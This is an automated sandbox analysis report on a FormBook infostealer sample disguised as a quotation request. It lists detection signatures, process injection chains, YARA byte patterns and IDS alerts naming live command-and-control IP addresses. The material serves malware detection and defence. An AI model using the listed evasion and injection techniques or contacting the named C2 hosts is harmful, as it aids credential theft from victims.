Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
URGENT REQUEST FOR QUOTATION.exe

Overview

General Information

Sample name:URGENT REQUEST FOR QUOTATION.exe
Analysis ID:1547643
MD5:3e669448cc820c7782ea383da5dfc6cd
SHA1:ace1ec9a1046ad2e8517318197f4b3e1fdb494ed
SHA256:276191052d2f1d5e9b3d86239b82231f250565fd5401d240227b1c16ba966f87
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • URGENT REQUEST FOR QUOTATION.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe" MD5: 3E669448CC820C7782EA383DA5DFC6CD)
    • svchost.exe (PID: 1732 cmdline: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • iadfuWOlEqeEML.exe (PID: 3444 cmdline: "C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • notepad.exe (PID: 3468 cmdline: "C:\Windows\SysWOW64\notepad.exe" MD5: E92D3A824A0578A50D2DD81B5060145F)
          • iadfuWOlEqeEML.exe (PID: 3104 cmdline: "C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4076 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x190596:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x178665:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x3a8fc:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x229cb:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e693:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16762:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe" , CommandLine: "C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe, NewProcessName: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe, OriginalFileName: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe, ParentCommandLine: "C:\Windows\SysWOW64\notepad.exe", ParentImage: C:\Windows\SysWOW64\notepad.exe, ParentProcessId: 3468, ParentProcessName: notepad.exe, ProcessCommandLine: "C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe" , ProcessId: 3104, ProcessName: iadfuWOlEqeEML.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", CommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", CommandLine|base64offset|contains: DD$, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", ParentImage: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe, ParentProcessId: 6260, ParentProcessName: URGENT REQUEST FOR QUOTATION.exe, ProcessCommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", ProcessId: 1732, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", CommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", CommandLine|base64offset|contains: DD$, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", ParentImage: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe, ParentProcessId: 6260, ParentProcessName: URGENT REQUEST FOR QUOTATION.exe, ProcessCommandLine: "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe", ProcessId: 1732, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-02T19:58:19.436606+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449730TCP
            2024-11-02T19:58:58.160087+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449736TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-02T19:58:59.752236+010020507451Malware Command and Control Activity Detected192.168.2.4497373.33.130.19080TCP
            2024-11-02T19:59:23.506988+010020507451Malware Command and Control Activity Detected192.168.2.4498553.33.130.19080TCP
            2024-11-02T19:59:37.662317+010020507451Malware Command and Control Activity Detected192.168.2.449924188.114.97.380TCP
            2024-11-02T19:59:52.549123+010020507451Malware Command and Control Activity Detected192.168.2.45000331.31.196.1780TCP
            2024-11-02T20:00:07.012343+010020507451Malware Command and Control Activity Detected192.168.2.4500183.33.130.19080TCP
            2024-11-02T20:00:20.362830+010020507451Malware Command and Control Activity Detected192.168.2.4500223.33.130.19080TCP
            2024-11-02T20:00:34.178759+010020507451Malware Command and Control Activity Detected192.168.2.450026199.192.21.16980TCP
            2024-11-02T20:00:47.554911+010020507451Malware Command and Control Activity Detected192.168.2.45003015.197.225.12880TCP
            2024-11-02T20:01:01.010025+010020507451Malware Command and Control Activity Detected192.168.2.450034188.114.97.380TCP
            2024-11-02T20:01:14.572456+010020507451Malware Command and Control Activity Detected192.168.2.45003884.32.84.3280TCP
            2024-11-02T20:01:28.268555+010020507451Malware Command and Control Activity Detected192.168.2.4500423.33.130.19080TCP
            2024-11-02T20:01:42.919758+010020507451Malware Command and Control Activity Detected192.168.2.45004634.92.248.21680TCP
            2024-11-02T20:02:05.835121+010020507451Malware Command and Control Activity Detected192.168.2.45005045.56.219.23880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-02T19:58:59.752236+010028554651A Network Trojan was detected192.168.2.4497373.33.130.19080TCP
            2024-11-02T19:59:23.506988+010028554651A Network Trojan was detected192.168.2.4498553.33.130.19080TCP
            2024-11-02T19:59:37.662317+010028554651A Network Trojan was detected192.168.2.449924188.114.97.380TCP
            2024-11-02T19:59:52.549123+010028554651A Network Trojan was detected192.168.2.45000331.31.196.1780TCP
            2024-11-02T20:00:07.012343+010028554651A Network Trojan was detected192.168.2.4500183.33.130.19080TCP
            2024-11-02T20:00:20.362830+010028554651A Network Trojan was detected192.168.2.4500223.33.130.19080TCP
            2024-11-02T20:00:34.178759+010028554651A Network Trojan was detected192.168.2.450026199.192.21.16980TCP
            2024-11-02T20:00:47.554911+010028554651A Network Trojan was detected192.168.2.45003015.197.225.12880TCP
            2024-11-02T20:01:01.010025+010028554651A Network Trojan was detected192.168.2.450034188.114.97.380TCP
            2024-11-02T20:01:14.572456+010028554651A Network Trojan was detected192.168.2.45003884.32.84.3280TCP
            2024-11-02T20:01:28.268555+010028554651A Network Trojan was detected192.168.2.4500423.33.130.19080TCP
            2024-11-02T20:01:42.919758+010028554651A Network Trojan was detected192.168.2.45004634.92.248.21680TCP
            2024-11-02T20:02:05.835121+010028554651A Network Trojan was detected192.168.2.45005045.56.219.23880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-02T19:59:15.774748+010028554641A Network Trojan was detected192.168.2.4498133.33.130.19080TCP
            2024-11-02T19:59:18.397222+010028554641A Network Trojan was detected192.168.2.4498293.33.130.19080TCP
            2024-11-02T19:59:20.874788+010028554641A Network Trojan was detected192.168.2.4498423.33.130.19080TCP
            2024-11-02T19:59:30.068307+010028554641A Network Trojan was detected192.168.2.449886188.114.97.380TCP
            2024-11-02T19:59:32.264938+010028554641A Network Trojan was detected192.168.2.449902188.114.97.380TCP
            2024-11-02T19:59:35.439788+010028554641A Network Trojan was detected192.168.2.449915188.114.97.380TCP
            2024-11-02T19:59:44.814744+010028554641A Network Trojan was detected192.168.2.44995731.31.196.1780TCP
            2024-11-02T19:59:47.314833+010028554641A Network Trojan was detected192.168.2.44997331.31.196.1780TCP
            2024-11-02T19:59:50.033490+010028554641A Network Trojan was detected192.168.2.44998831.31.196.1780TCP
            2024-11-02T19:59:58.356579+010028554641A Network Trojan was detected192.168.2.4500153.33.130.19080TCP
            2024-11-02T20:00:00.977003+010028554641A Network Trojan was detected192.168.2.4500163.33.130.19080TCP
            2024-11-02T20:00:04.393140+010028554641A Network Trojan was detected192.168.2.4500173.33.130.19080TCP
            2024-11-02T20:00:12.699785+010028554641A Network Trojan was detected192.168.2.4500193.33.130.19080TCP
            2024-11-02T20:00:15.334034+010028554641A Network Trojan was detected192.168.2.4500203.33.130.19080TCP
            2024-11-02T20:00:17.817660+010028554641A Network Trojan was detected192.168.2.4500213.33.130.19080TCP
            2024-11-02T20:00:26.343825+010028554641A Network Trojan was detected192.168.2.450023199.192.21.16980TCP
            2024-11-02T20:00:29.057364+010028554641A Network Trojan was detected192.168.2.450024199.192.21.16980TCP
            2024-11-02T20:00:31.618572+010028554641A Network Trojan was detected192.168.2.450025199.192.21.16980TCP
            2024-11-02T20:00:40.094206+010028554641A Network Trojan was detected192.168.2.45002715.197.225.12880TCP
            2024-11-02T20:00:42.393782+010028554641A Network Trojan was detected192.168.2.45002815.197.225.12880TCP
            2024-11-02T20:00:44.959597+010028554641A Network Trojan was detected192.168.2.45002915.197.225.12880TCP
            2024-11-02T20:00:53.315766+010028554641A Network Trojan was detected192.168.2.450031188.114.97.380TCP
            2024-11-02T20:00:55.850869+010028554641A Network Trojan was detected192.168.2.450032188.114.97.380TCP
            2024-11-02T20:00:58.402104+010028554641A Network Trojan was detected192.168.2.450033188.114.97.380TCP
            2024-11-02T20:01:06.958871+010028554641A Network Trojan was detected192.168.2.45003584.32.84.3280TCP
            2024-11-02T20:01:09.490640+010028554641A Network Trojan was detected192.168.2.45003684.32.84.3280TCP
            2024-11-02T20:01:12.032393+010028554641A Network Trojan was detected192.168.2.45003784.32.84.3280TCP
            2024-11-02T20:01:20.446412+010028554641A Network Trojan was detected192.168.2.4500393.33.130.19080TCP
            2024-11-02T20:01:22.913097+010028554641A Network Trojan was detected192.168.2.4500403.33.130.19080TCP
            2024-11-02T20:01:25.457410+010028554641A Network Trojan was detected192.168.2.4500413.33.130.19080TCP
            2024-11-02T20:01:35.101132+010028554641A Network Trojan was detected192.168.2.45004334.92.248.21680TCP
            2024-11-02T20:01:37.645682+010028554641A Network Trojan was detected192.168.2.45004434.92.248.21680TCP
            2024-11-02T20:01:40.287081+010028554641A Network Trojan was detected192.168.2.45004534.92.248.21680TCP
            2024-11-02T20:01:57.843634+010028554641A Network Trojan was detected192.168.2.45004745.56.219.23880TCP
            2024-11-02T20:02:00.399991+010028554641A Network Trojan was detected192.168.2.45004845.56.219.23880TCP
            2024-11-02T20:02:02.955966+010028554641A Network Trojan was detected192.168.2.45004945.56.219.23880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: URGENT REQUEST FOR QUOTATION.exeAvira: detected
            Source: URGENT REQUEST FOR QUOTATION.exeReversingLabs: Detection: 68%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4129751866.0000000003670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131591003.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075405334.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128947956.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128861229.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075121033.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4128488023.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2075735813.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: URGENT REQUEST FOR QUOTATION.exeJoe Sandbox ML: detected
            Source: URGENT REQUEST FOR QUOTATION.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000001.00000003.2043645344.0000000002A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043561266.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4128908915.0000000000E07000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdb source: svchost.exe, 00000001.00000003.2043645344.0000000002A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043561266.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000005.00000002.4128908915.0000000000E07000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iadfuWOlEqeEML.exe, 00000005.00000000.1997263361.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, iadfuWOlEqeEML.exe, 00000008.00000000.2149531775.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791927284.0000000004590000.00000004.00001000.00020000.00000000.sdmp, URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791106114.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1983828950.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1985268186.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.0000000003100000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2084217332.0000000004A10000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2082299501.0000000004868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791927284.0000000004590000.00000004.00001000.00020000.00000000.sdmp, URGENT REQUEST FOR QUOTATION.exe, 00000000.00000003.1791106114.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1983828950.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1985268186.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2075430736.0000000003100000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000006.00000002.4130032085.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130032085.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2084217332.0000000004A10000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000003.2082299501.0000000004868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000006.00000002.4129028971.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130391348.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2425494777.000000000770C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000006.00000002.4129028971.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000006.00000002.4130391348.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, iadfuWOlEqeEML.exe, 00000008.00000002.4130063768.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2425494777.000000000770C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029AC520 FindFirstFileW,FindNextFileW,FindClose,6_2_029AC520
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then xor eax, eax6_2_02999B80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then mov ebx, 00000004h6_2_04A104E8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49813 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49829 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49855 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49855 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49886 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49902 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49924 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49924 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49988 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50003 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50003 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 15.197.225.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 15.197.225.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 199.192.21.169:80
